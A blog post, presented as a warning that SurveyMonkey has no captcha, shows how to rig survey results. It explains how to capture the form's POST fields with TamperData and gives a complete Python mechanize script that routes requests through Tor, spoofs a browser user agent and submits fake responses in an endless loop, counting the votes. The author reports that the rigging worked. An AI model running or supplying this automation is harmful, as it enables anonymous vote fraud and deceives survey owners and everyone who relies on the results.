Survey Monkey has no captcha, beware

As Survey Monkey is used for surveys you want to have real results.

This post will show how easily it would be to vote fraudulently and manipulate poll results.

For this example, I will be using python with it’s mechanize module and Tor installed on Linux. You will also need Firefox with the TamperData plugin.

Firstly I have created a test Survey.

Capture

Next, I will find out the post data using TamperData.

gettingdataPNG

The important data has been highlighted. The input name on the left is the name of the form element for the What is my name and the number corresponding to it on the far right is the answer I picked “billy”. The rest of the post data is hidden fields and tokens to identify the response.

With this information, it’s easy to put together a script to automate the submission of the survey. Below is the commented code for the example submission.

http://pastebay.net/1203480

#!/usr/bin/env python
#SurveyMonkey needs captcha
import mechanize
import socks
import socket
#patch to use tor, code from stackcoverflow not mine
def create_connection(address, timeout=None, source_address=None):
    sock = socks.socksocket()
    sock.connect(address)
    return sock

socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
socket.socket = socks.socksocket
socket.create_connection = create_connection
count = 0
while True:
    br = mechanize.Browser()# Open the broswer object
    br.addheaders = [('User-agent', ' Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31')]
    br.open('http://www.surveymonkey.com/s/AAAAA') # survey to test
    br.select_form(nr=0)
    #What is my name?
    br.form.set_value(['6024902055_0'],name='input_518253276_10_0_0')
    #Drop down you say selection c
    br.form.set_value(['6024902970'],name='input_518253330_50_6024902966_6024902967')
    #Tell me about yourself
    text = "testing 123" # text for the form
    br.form.set_value(text,name='text_518253292_0')
    br.submit()#submit the form
    br.response().read()#print the response
    print br.response().read()
    count+=1
    print "Number of votes: "+ str(count) # print number of votes

The script worked as expected and billy was the most popular name.
fakevotes

3u4xj5

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.